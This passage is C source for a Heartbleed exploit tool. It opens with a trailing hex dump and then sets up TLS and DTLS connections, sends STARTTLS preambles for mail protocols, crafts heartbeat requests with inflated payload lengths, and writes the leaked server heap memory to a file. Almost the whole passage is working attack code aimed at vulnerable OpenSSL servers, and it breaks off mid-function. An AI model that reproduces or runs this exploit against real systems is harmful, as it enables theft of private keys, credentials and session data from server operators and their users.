5e 46 74 fa 89 |......&J...^Ft..| \n* 00000150 e3 7d 58 76 23 ba ba dc b1 35 98 35 a5 ba 53 a1 |.}Xv#....5.5..S.| \n* 00000160 5b 37 28 fe f7 d0 02 fc fd c9 e3 b1 ee e6 fe 79 |[7(............y| \n* 00000170 86 f8 81 1a 29 29 a9 81 95 1c c9 5c 81 a2 e8 0c |....)).....\\....| \n* 00000180 35 b7 cb 67 8a ec 2a d1 73 e6 70 78 53 c8 50 91 |5..g..*.s.pxS.P.| \n* 00000190 49 07 db e1 a4 08 7b fb 07 54 48 85 45 c2 38 71 |I.....{..TH.E.8q| \n* 000001a0 6a 8a f2 4d a7 ba 1a 86 36 a2 ae bb a1 e1 7c 2c |j..M....6.....|,| \n* 000001b0 12 04 ce e5 d1 75 24 94 1c 31 2c 46 b7 76 30 3a |.....u$..1,F.v0:| \n* 000001c0 04 79 2f b3 65 74 fb ae c7 10 a5 da a8 2d b6 fd |.y/.et.......-..| \n* 000001d0 cf f9 11 fe 38 cd 25 7e 13 75 14 1d 58 92 bb 3f |....8.%~.u..X..?| \n* 000001e0 8f 75 d5 52 f7 27 66 ca 5d 55 4d 0a b5 71 a2 16 |.u.R.'f.]UM..q..| \n* 000001f0 3e 01 af 97 93 eb 5c 3f e0 fa c8 61 2c a1 87 8f |>.....\\?...a,...| \n* 00000200 60 d4 df 5d 9d cd 0f 34 a9 66 6c 93 d8 5f 4a 2b |`..]...4.fl.._J+| \n* 00000210 fd 67 3a 2f 88 90 b4 e9 f5 d6 ee bb 7d 8b 1c e5 |.g:/........}...| \n* 00000220 f2 cc 4f b2 c0 dc e8 1b 4c 6e 51 c9 47 8b 6c 82 |..O.....LnQ.G.l.| \n* 00000230 f9 4b ae 01 a8 f9 6c 6d d5 1a d5 cf 63 f4 7f e0 |.K....lm....c...| \n* 00000240 96 54 3f 7d 02 03 01 00 01 a3 50 30 4e 30 1d 06 |.T?}......P0N0..| \n* 00000250 03 55 1d 0e 04 16 04 14 af 97 4e 87 62 8a 77 b8 |.U........N.b.w.| \n* 00000260 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 1f 06 03 |..$ 5.f.U?t.0...| \n* 00000270 55 1d 23 04 18 30 16 80 14 af 97 4e 87 62 8a 77 |U.#..0.....N.b.w| \n* 00000280 b8 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 0c 06 |...$ 5.f.U?t.0..| \n* 00000290 03 55 1d 13 04 05 30 03 01 01 ff 30 0d 06 09 2a |.U....0....0...*| \n* 000002a0 86 48 86 f7 0d 01 01 05 05 00 03 82 01 01 00 b0 |.H..............| \n* 000002b0 8e 40 58 2d 86 32 95 11 a7 a1 64 1d fc 08 8d 87 |.@X-.2....d.....| \n* 000002c0 18 d3 5d c6 a0 bb 84 4a 50 f5 27 1c 15 4b 02 0c |..]....JP.'..K..| \n* 000002d0 49 1f 2d 0a 52 d3 98 6b 71 3d b9 0f 36 24 d3 77 |I.-.R..kq=..6$.w| \n* 000002e0 e0 d0 a5 50 e5 ea 2d 67 11 69 4d 45 52 97 4d 58 |...P..-g.iMER.MX| \n* 000002f0 de 22 06 02 6d 21 80 2f 0d 1c d5 d5 80 5c 8f 44 |.\"..m!./.....\\.D| \n* 00000300 1e b6 f3 41 4c dc d3 40 8d 54 ac b0 ca 8f 19 6a |...AL..@.T.....j| \n* 00000310 4d f2 fb ad 68 5a 99 19 ca ae b2 f5 54 70 29 96 |M...hZ......Tp).| \n* 00000320 84 7e ba a9 6b 42 e6 68 32 dc 65 87 b1 b7 17 22 |.~..kB.h2.e....\"| \n* 00000330 e3 cc 62 97 e4 fa 64 0b 1e 70 bf e5 a2 40 e4 49 |..b...d..p...@.I| \n* 00000340 24 f9 05 3f 2e fe 7c 38 56 39 4d bd 51 63 0d 79 |$..?..|8V9M.Qc.y| \n* 00000350 85 c0 4b 1a 46 64 e0 fe a8 87 bf c7 4d 21 cb 79 |..K.Fd......M!.y| \n* 00000360 37 e7 a6 e3 6c 3b ed 35 17 73 7a 71 c6 72 2f bb |7...l;.5.szq.r/.| \n* 00000370 58 dc ef e9 1e a3 89 5e 70 cd 95 10 87 c1 8a 7e |X......^p......~| \n* 00000380 e7 51 c2 22 67 66 ee 22 f9 a5 2e 31 f2 ad fc 3b |.Q.\"gf.\"...1...;| \n* 00000390 98 c8 30 63 ef 74 b5 4e c4 bd c7 a2 46 0a b8 bf |..0c.t.N....F...| \n* 000003a0 df a8 54 0e 4f 37 d0 a5 27 a3 f3 a7 28 38 3f 16 |..T.O7..'...(8?.| \n* 000003b0 fe ff 00 00 00 00 00 00 00 02 00 0c 0e 00 00 00 |................| \n* 000003c0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| \n* 000003d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| \n* * \n* 00000530 00 00 00 00 00 00 00 00 82 8f be ff cf 26 12 9d |.............&..| \n* 00000540 a2 de 0c 44 21 4a 54 be 41 4c df |...D!JT.AL.| \n* 0000054b \n* \n*/ \n#include <stdio.h> \n#include <stdint.h> \n#include <stdlib.h> \n#include <string.h> \n#include <unistd.h> \n#include <getopt.h> \n#include <signal.h> \n#include <netdb.h> \n#include <fcntl.h> \n#include <errno.h> \n#include <sys/socket.h> \n#include <sys/types.h> \n#include <netinet/in.h> \n#include <inttypes.h> \n#include <openssl/bio.h> \n#include <openssl/ssl.h> \n#include <openssl/err.h> \n#include <openssl/evp.h> \n#include <openssl/tls1.h> \n#include <openssl/rand.h> \n#include <openssl/buffer.h> \n \n#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\ \n(((unsigned int)(c[1])) )),c+=2) \n#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\ \nc[1]=(unsigned char)(((s) )&0xff)),c+=2) \n \nint first = 0; \nint leakbytes = 0; \nint repeat = 1; \nint badpackets = 0; \n \ntypedef struct { \nint socket; \nSSL *sslHandle; \nSSL_CTX *sslContext; \n} connection; \n \ntypedef struct { \nunsigned char type; \nshort version; \nunsigned int length; \nunsigned char hbtype; \nunsigned int payload_length; \nvoid* payload; \n} heartbeat; \n \nvoid ssl_init(); \nvoid usage(); \nint tcp_connect(char*,int); \nint tcp_bind(char*, int); \nconnection* tls_connect(int); \nconnection* tls_bind(int); \nint pre_cmd(int,int,int); \nvoid* heartbleed(connection* ,unsigned int); \nvoid* sneakyleaky(connection* ,char*, int); \n \nstatic DTLS1_BITMAP *dtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch); \nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap); \nstatic int dtls1_buffer_record(SSL *s, record_pqueue *q, unsigned char *priority); \nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap); \n \nint tcp_connect(char* server,int port){ \nint sd,ret; \nstruct hostent *host; \nstruct sockaddr_in sa; \nhost = gethostbyname(server); \nsd = socket(AF_INET, SOCK_STREAM, 0); \nif(sd==-1){ \nprintf(\"[!] cannot create socket\\n\"); \nexit(0); \n} \nsa.sin_family = AF_INET; \nsa.sin_port = htons(port); \nsa.sin_addr = *((struct in_addr *) host->h_addr); \nbzero(&(sa.sin_zero),8); \nprintf(\"[ connecting to %s %d/tcp\\n\",server,port); \nret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr)); \nif(ret==0){ \nprintf(\"[ connected to %s %d/tcp\\n\",server,port); \n} \nelse{ \nprintf(\"[!] FATAL: could not connect to %s %d/tcp\\n\",server,port); \nexit(0); \n} \nreturn sd; \n} \n \nint tcp_bind(char* server, int port){ \nint sd, ret, val=1; \nstruct sockaddr_in sin; \nstruct hostent *host; \nhost = gethostbyname(server); \nsd=socket(AF_INET,SOCK_STREAM,0); \nif(sd==-1){ \nprintf(\"[!] cannot create socket\\n\"); \nexit(0); \n} \nmemset(&sin,0,sizeof(sin)); \nsin.sin_addr=*((struct in_addr *) host->h_addr); \nsin.sin_family=AF_INET; \nsin.sin_port=htons(port); \nsetsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val)); \nret = bind(sd,(struct sockaddr *)&sin,sizeof(sin)); \nif(ret==-1){ \nprintf(\"[!] cannot bind socket\\n\"); \nexit(0); \n} \nlisten(sd,5); \nreturn(sd); \n} \n \nconnection* dtls_server(int sd, char* server,int port){ \nint bytes; \nconnection *c; \nchar* buf; \nbuf = malloc(4096); \nint ret; \nstruct hostent *host; \nstruct sockaddr_in sa; \nunsigned long addr; \nif ((host = gethostbyname(server)) == NULL) { \nperror(\"gethostbyname\"); \nexit(1); \n} \nsd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); \nif(sd==-1){ \nprintf(\"[!] cannot create socket\\n\"); \nexit(0); \n} \nsa.sin_family = AF_INET; \nsa.sin_port = htons(port); \nsa.sin_addr = *((struct in_addr *) host->h_addr); \nif (bind(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) { \nperror(\"bind()\"); \nexit(1); \n} \n \nBIO *bio; \nif(c==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nif(buf==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nmemset(buf,0,4096); \nc = malloc(sizeof(connection)); \nif(c==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nc->socket = sd; \nc->sslHandle = NULL; \nc->sslContext = NULL; \nc->sslContext = SSL_CTX_new(DTLSv1_server_method()); \nSSL_CTX_set_read_ahead (c->sslContext, 1); \nif(c->sslContext==NULL) \nERR_print_errors_fp(stderr); \nSSL_CTX_SRP_CTX_init(c->sslContext); \nSSL_CTX_use_certificate_file(c->sslContext, \"./server.crt\", SSL_FILETYPE_PEM); \nSSL_CTX_use_PrivateKey_file(c->sslContext, \"./server.key\", SSL_FILETYPE_PEM); \nif(!SSL_CTX_check_private_key(c->sslContext)){ \nprintf(\"[!] FATAL: private key does not match the certificate public key\\n\"); \nexit(0); \n} \nc->sslHandle = SSL_new(c->sslContext); \nif(c->sslHandle==NULL) \nERR_print_errors_fp(stderr); \nif(!SSL_set_fd(c->sslHandle,c->socket)) \nERR_print_errors_fp(stderr); \nbio = BIO_new_dgram(sd, BIO_NOCLOSE); \n \nSSL_set_bio(c->sslHandle, bio, bio); \nSSL_set_accept_state (c->sslHandle); \n \nint rc = SSL_accept(c->sslHandle); \nprintf (\"[ SSL connection using %s\\n\", SSL_get_cipher (c->sslHandle)); \n// bytes = SSL_read(c->sslHandle, buf, 4095); \n// printf(\"[ recieved: %d bytes - showing output\\n%s\\n[\\n\",bytes,buf); \nif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED || \nc->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){ \nprintf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\"); \n} \nreturn c; \n} \n \nvoid ssl_init(){ \nSSL_load_error_strings(); \nSSL_library_init(); \nOpenSSL_add_all_digests(); \nOpenSSL_add_all_algorithms(); \nOpenSSL_add_all_ciphers(); \n} \n \nconnection* tls_connect(int sd){ \nconnection *c; \nc = malloc(sizeof(connection)); \nif(c==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nc->socket = sd; \nc->sslHandle = NULL; \nc->sslContext = NULL; \nc->sslContext = SSL_CTX_new(SSLv23_client_method()); \nSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3); \nif(c->sslContext==NULL) \nERR_print_errors_fp(stderr); \nc->sslHandle = SSL_new(c->sslContext); \nif(c->sslHandle==NULL) \nERR_print_errors_fp(stderr); \nif(!SSL_set_fd(c->sslHandle,c->socket)) \nERR_print_errors_fp(stderr); \nif(SSL_connect(c->sslHandle)!=1) \nERR_print_errors_fp(stderr); \nif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED || \nc->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){ \nprintf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\"); \n} \nreturn c; \n} \n \nconnection* dtls_client(int sd, char* server,int port){ \nint ret; \nstruct hostent *host; \nstruct sockaddr_in sa; \nconnection *c; \nmemset((char *)&sa,0,sizeof(sa)); \nc = malloc(sizeof(connection)); \nif ((host = gethostbyname(server)) == NULL) { \nperror(\"gethostbyname\"); \nexit(1); \n} \nsd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); \nif(sd==-1){ \nprintf(\"[!] cannot create socket\\n\"); \nexit(0); \n} \nsa.sin_family = AF_INET; \nsa.sin_port = htons(port); \nsa.sin_addr = *((struct in_addr *) host->h_addr); \nif (connect(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) { \nperror(\"connect()\"); \nexit(0); \n} \n \nBIO *bio; \nif(c==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \n \nc->sslContext = NULL; \nc->sslContext = SSL_CTX_new(DTLSv1_client_method()); \nSSL_CTX_set_read_ahead (c->sslContext, 1); \nif(c->sslContext==NULL) \nERR_print_errors_fp(stderr); \nif(c->sslHandle==NULL) \nERR_print_errors_fp(stderr); \n \nc->socket = sd; \nc->sslHandle = NULL; \nc->sslHandle = SSL_new(c->sslContext); \nSSL_set_tlsext_host_name(c->sslHandle,server); \nbio = BIO_new_dgram(sd, BIO_NOCLOSE); \n \nBIO_ctrl_set_connected(bio, 1, &sa); \nSSL_set_bio(c->sslHandle, bio, bio); \nSSL_set_connect_state (c->sslHandle); \n//printf(\"eshta\\n\"); \nif(SSL_connect(c->sslHandle)!=1) \nERR_print_errors_fp(stderr); \n \nif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED || \nc->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){ \nprintf(\"[ warning: heartbeat extension is unsupported (try anyway), %d \\n\",c->sslHandle->tlsext_heartbeat); \n} \nreturn c; \n} \n \nconnection* tls_bind(int sd){ \nint bytes; \nconnection *c; \nchar* buf; \nbuf = malloc(4096); \nif(buf==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nmemset(buf,0,4096); \nc = malloc(sizeof(connection)); \nif(c==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nc->socket = sd; \nc->sslHandle = NULL; \nc->sslContext = NULL; \nc->sslContext = SSL_CTX_new(SSLv23_server_method()); \nif(c->sslContext==NULL) \nERR_print_errors_fp(stderr); \nSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3); \nSSL_CTX_SRP_CTX_init(c->sslContext); \nSSL_CTX_use_certificate_file(c->sslContext, \"./server.crt\", SSL_FILETYPE_PEM); \nSSL_CTX_use_PrivateKey_file(c->sslContext, \"./server.key\", SSL_FILETYPE_PEM); \nif(!SSL_CTX_check_private_key(c->sslContext)){ \nprintf(\"[!] FATAL: private key does not match the certificate public key\\n\"); \nexit(0); \n} \nc->sslHandle = SSL_new(c->sslContext); \nif(c->sslHandle==NULL) \nERR_print_errors_fp(stderr); \nif(!SSL_set_fd(c->sslHandle,c->socket)) \nERR_print_errors_fp(stderr); \nint rc = SSL_accept(c->sslHandle); \nprintf (\"[ SSL connection using %s\\n\", SSL_get_cipher (c->sslHandle)); \nbytes = SSL_read(c->sslHandle, buf, 4095); \nprintf(\"[ recieved: %d bytes - showing output\\n%s\\n[\\n\",bytes,buf); \nif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED || \nc->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){ \nprintf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\"); \n} \nreturn c; \n} \n \nint pre_cmd(int sd,int precmd,int verbose){ \n/* this function can be used to send commands to a plain-text \nservice or client before heartbleed exploit attempt. e.g. STARTTLS */ \nint rc, go = 0; \nchar* buffer; \nchar* line1; \nchar* line2; \nswitch(precmd){ \ncase 0: \nline1 = \"EHLO test\\n\"; \nline2 = \"STARTTLS\\n\"; \nbreak; \ncase 1: \nline1 = \"CAPA\\n\"; \nline2 = \"STLS\\n\"; \nbreak; \ncase 2: \nline1 = \"a001 CAPB\\n\"; \nline2 = \"a002 STARTTLS\\n\"; \nbreak; \ndefault: \ngo = 1; \nbreak; \n} \nif(go==0){ \nbuffer = malloc(2049); \nif(buffer==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nmemset(buffer,0,2049); \nrc = read(sd,buffer,2048); \nprintf(\"[ banner: %s\",buffer); \nsend(sd,line1,strlen(line1),0); \nmemset(buffer,0,2049); \nrc = read(sd,buffer,2048); \nif(verbose==1){ \nprintf(\"%s\\n\",buffer); \n} \nsend(sd,line2,strlen(line2),0); \nmemset(buffer,0,2049); \nrc = read(sd,buffer,2048); \nif(verbose==1){ \nprintf(\"%s\\n\",buffer); \n} \n} \nreturn sd; \n} \n \nvoid* heartbleed(connection *c,unsigned int type){ \nunsigned char *buf, *p; \nint ret; \nbuf = OPENSSL_malloc(1 + 2); \nif(buf==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \np = buf; \n*p++ = TLS1_HB_REQUEST; \nswitch(type){ \ncase 0: \ns2n(0x0,p); \nbreak; \ncase 1: \ns2n(0xffff,p); \nbreak; \ndefault: \nprintf(\"[ setting heartbeat payload_length to %u\\n\",type); \ns2n(type,p); \nbreak; \n} \nprintf(\"[ <3 <3 <3 heart bleed <3 <3 <3\\n\"); \nret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3); \nOPENSSL_free(buf); \nreturn c; \n} \n \nvoid* dtlsheartbleed(connection *c,unsigned int type){ \n \nunsigned char *buf, *p; \nint ret; \nbuf = OPENSSL_malloc(1 + 2 + 16); \nmemset(buf, '\\0', sizeof buf); \nif(buf==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \np = buf; \n*p++ = TLS1_HB_REQUEST; \nswitch(type){ \ncase 0: \ns2n(0x0,p); \nbreak; \ncase 1: \n// s2n(0xffff,p); \n// s2n(0x3feb,p); \ns2n(0x0538,p); \nbreak; \ndefault: \nprintf(\"[ setting heartbeat payload_length to %u\\n\",type); \ns2n(type,p); \nbreak; \n} \ns2n(c->sslHandle->tlsext_hb_seq, p); \nprintf(\"[ <3 <3 <3 heart bleed <3 <3 <3\\n\"); \n \nret = dtls1_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3 + 16); \n \nif (ret >= 0) \n{ \nif (c->sslHandle->msg_callback) \nc->sslHandle->msg_callback(1, c->sslHandle->version, TLS1_RT_HEARTBEAT, \nbuf, 3 + 16, \nc->sslHandle, c->sslHandle->msg_callback_arg); \n \ndtls1_start_timer(c->sslHandle); \nc->sslHandle->tlsext_hb_pending = 1; \n} \n \nOPENSSL_free(buf); \n \nreturn c; \n} \n \nvoid* sneakyleaky(connection *c,char* filename, int verbose){ \nchar *p; \nint ssl_major,ssl_minor,al; \nint enc_err,n,i; \nSSL3_RECORD *rr; \nSSL_SESSION *sess; \nSSL* s; \nunsigned char md[EVP_MAX_MD_SIZE]; \nshort version; \nunsigned mac_size, orig_len; \nsize_t extra; \nrr= &(c->sslHandle->s3->rrec); \nsess=c->sslHandle->session; \ns = c->sslHandle; \nif (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER) \nextra=SSL3_RT_MAX_EXTRA; \nelse \nextra=0; \nif ((s->rstate != SSL_ST_READ_BODY) || \n(s->packet_length < SSL3_RT_HEADER_LENGTH)) { \nn=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0); \nif (n <= 0) \ngoto apple; \ns->rstate=SSL_ST_READ_BODY; \np=s->packet; \nrr->type= *(p++); \nssl_major= *(p++); \nssl_minor= *(p++); \nversion=(ssl_major<<8)|ssl_minor; \nn2s(p,rr->length); \nif(rr->type==24){ \nprintf(\"[ heartbeat returned type=%d length=%u\\n\",rr->type, rr->length); \nif(rr->length > 16834){ \nprintf(\"[ error: got a malformed TLS length.\\n\"); \nexit(0); \n} \n} \nelse{ \nprintf(\"[ incorrect record type=%d length=%u returned\\n\",rr->type,rr->length); \ns->packet_length=0; \nbadpackets++; \nif(badpackets > 3){ \nprintf(\"[ error: too many bad packets recieved\\n\"); \nexit(0); \n} \ngoto apple; \n} \n} \nif (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){ \ni=rr->length; \nn=ssl3_read_n(s,i,i,1); \nif (n <= 0) goto apple; \n} \nprintf(\"[ decrypting SSL packet\\n\"); \ns->rstate=SSL_ST_READ_HEADER; \nrr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]); \nrr->data=rr->input; \ntls1_enc(s,0); \nif((sess != NULL) && \n(s->enc_read_ctx != NULL) && \n(EVP_MD_CTX_md(s->read_hash) != NULL)) \n{ \nunsigned char *mac = NULL; \nunsigned char mac_tmp[EVP_MAX_MD_SIZE]; \nmac_size=EVP_MD_CTX_size(s->read_hash); \nOPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE); \norig_len = rr->length+((unsigned int)rr->type>>8); \nif(orig_len < mac_size || \n(EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE && \norig_len < mac_size+1)){ \nal=SSL_AD_DECODE_ERROR; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT); \n} \nif (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){ \nmac = mac_tmp; \nssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len); \nrr->length -= mac_size; \n} \nelse{ \nrr->length -= mac_size; \nmac = &rr->data[rr->length]; \n} \ni = tls1_mac(s,md,0); \nif (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0) \nenc_err = -1; \nif (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size) \nenc_err = -1; \n} \nif(enc_err < 0){ \nal=SSL_AD_BAD_RECORD_MAC; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC); \ngoto apple; \n} \nif(s->expand != NULL){ \nif (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) { \nal=SSL_AD_RECORD_OVERFLOW; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG); \ngoto apple; \n} \nif (!ssl3_do_uncompress(s)) { \nal=SSL_AD_DECOMPRESSION_FAILURE; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION); \ngoto apple; \n} \n} \nif (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) { \nal=SSL_AD_RECORD_OVERFLOW; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG); \ngoto apple; \n} \nrr->off=0; \ns->packet_length=0; \nif(first==0){ \nuint heartbleed_len = 0; \nchar* fp = s->s3->rrec.data; \n(long)fp++; \nmemcpy(&heartbleed_len,fp,2); \nheartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8; \nfirst = 2; \nleakbytes = heartbleed_len + 16; \nprintf(\"[ heartbleed leaked length=%u\\n\",heartbleed_len); \n} \nif(verbose==1){ \n{ unsigned int z; for (z=0; z<rr->length; z++) printf(\"%02X%c\",rr->data[z],((z+1)%16)?' ':'\\n'); } \nprintf(\"\\n\"); \n} \nleakbytes-=rr->length; \nif(leakbytes > 0){ \nrepeat = 1; \n} \nelse{ \nrepeat = 0; \n} \nprintf(\"[ final record type=%d, length=%u\\n\", rr->type, rr->length); \nint output = s->s3->rrec.length-3; \nif(output > 0){ \nint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700); \nif(first==2){ \nfirst--; \nwrite(fd,s->s3->rrec.data+3,s->s3->rrec.length); \n/* first three bytes are resp+len */ \nprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length-3,filename); \n} \nelse{ \n/* heap data & 16 bytes padding */ \nwrite(fd,s->s3->rrec.data+3,s->s3->rrec.length); \nprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length,filename); \n} \nclose(fd); \n} \nelse{ \nprintf(\"[ nothing from the heap to write\\n\"); \n} \nreturn; \napple: \nprintf(\"[ problem handling SSL record packet - wrong type?\\n\"); \nbadpackets++; \nif(badpackets > 3){ \nprintf(\"[ error: too many bad packets recieved\\n\"); \nexit(0); \n} \nreturn; \n} \n \n \nvoid* dtlssneakyleaky(connection *c,char* filename, int verbose){ \nchar *p; \nint ssl_major,ssl_minor,al; \nint enc_err,n,i; \nSSL3_RECORD *rr; \nSSL_SESSION *sess; \nSSL* s; \nDTLS1_BITMAP *bitmap; \nunsigned int is_next_epoch; \nunsigned char md[EVP_MAX_MD_SIZE]; \nshort version; \nunsigned int mac_size, orig_len; \n \nrr= &(c->sslHandle->s3->rrec); \nsess=c->sslHandle->session; \ns = c->sslHandle; \n \nagain: \nif ((s->rstate != SSL_ST_READ_BODY) || \n(s->packet_length < DTLS1_RT_HEADER_LENGTH)) { \nn=ssl3_read_n(s, DTLS1_RT_HEADER_LENGTH, s->s3->rbuf.len, 0); \nif (n <= 0) \ngoto apple; \n \ns->rstate=SSL_ST_READ_BODY; \np=s->packet; \nrr->type= *(p++); \nssl_major= *(p++); \nssl_minor= *(p++); \nversion=(ssl_major<<8)|ssl_minor; \nn2s(p,rr->epoch); \nmemcpy(&(s->s3->read_sequence[2]), p, 6); \np+=6; \nn2s(p,rr->length); \nif(rr->type==24){ \nprintf(\"[ heartbeat returned type=%d length=%u\\n\",rr->type, rr->length); \nif(rr->length > 16834){ \nprintf(\"[ error: got a malformed TLS length.\\n\"); \nexit(0); \n} \n} \nelse{ \nprintf(\"[ incorrect record type=%d length=%u returned\\n\",rr->type,rr->length); \ns->packet_length=0; \nbadpackets++; \nif(badpackets > 3){ \nprintf(\"[ error: too many bad packets recieved\\n\"); \nexit(0); \n} \ngoto apple; \n} \n} \n \nif (rr->length > s->packet_length-DTLS1_RT_HEADER_LENGTH){ \ni=rr->length; \nn=ssl3_read_n(s,i,i,1); \nif (n <= 0) goto apple; \n} \nif ( n != i) \n{ \nrr->length = 0; \ns->packet_length = 0; \ngoto again; \n} \nprintf(\"[ decrypting SSL packet\\n\"); \ns->rstate=SSL_ST_READ_HEADER; \n \nbitmap = dtls1_get_bitmap(s, rr, &is_next_epoch); \nif ( bitmap == NULL) \n{ \nrr->length = 0; \ns->packet_length = 0; \ngoto again; \n} \n \nif (!(s->d1->listen && rr->type == SSL3_RT_HANDSHAKE && \n*p == SSL3_MT_CLIENT_HELLO) && \n!dtls1_record_replay_check(s, bitmap)) \n{ \nrr->length = 0; \ns->packet_length=0; \ngoto again; \n} \n \nif (rr->length == 0) goto again; \nif (is_next_epoch) \n{ \nif ((SSL_in_init(s) || s->in_handshake) && !s->d1->listen) \n{ \ndtls1_buffer_record(s, &(s->d1->unprocessed_rcds), rr->seq_num); \n} \nrr->length = 0; \ns->packet_length = 0; \ngoto again; \n} \n \n \nrr->input= &(s->packet[DTLS1_RT_HEADER_LENGTH]); \nrr->data=rr->input; \norig_len=rr->length; \n \ndtls1_enc(s,0); \n \nif((sess != NULL) && \n(s->enc_read_ctx != NULL) && \n(EVP_MD_CTX_md(s->read_hash) != NULL)) \n{ \nunsigned char *mac = NULL; \nunsigned char mac_tmp[EVP_MAX_MD_SIZE]; \nmac_size=EVP_MD_CTX_size(s->read_hash); \nOPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE); \norig_len = rr->length+((unsigned int)rr->type>>8); \nif(orig_len < mac_size || \n(EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE && \norig_len < mac_size+1)){ \nal=SSL_AD_DECODE_ERROR; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT); \n} \nif (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){ \nmac = mac_tmp; \nssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len); \nrr->length -= mac_size; \n} \nelse{ \nrr->length -= mac_size; \nmac = &rr->data[rr->length]; \n} \ni = tls1_mac(s,md,0); \n \nif (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0) \nenc_err = -1; \n \nif (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+mac_size) \nenc_err = -1; \n} \nif(enc_err < 0){ \nal=SSL_AD_BAD_RECORD_MAC; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC); \ngoto apple; \n} \nif(s->expand != NULL){ \nif (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH) { \nal=SSL_AD_RECORD_OVERFLOW; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG); \ngoto apple; \n} \nif (!ssl3_do_uncompress(s)) { \nal=SSL_AD_DECOMPRESSION_FAILURE; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION); \ngoto apple; \n} \n} \n \nif (rr->length > SSL3_RT_MAX_PLAIN_LENGTH) { \nal=SSL_AD_RECORD_OVERFLOW; 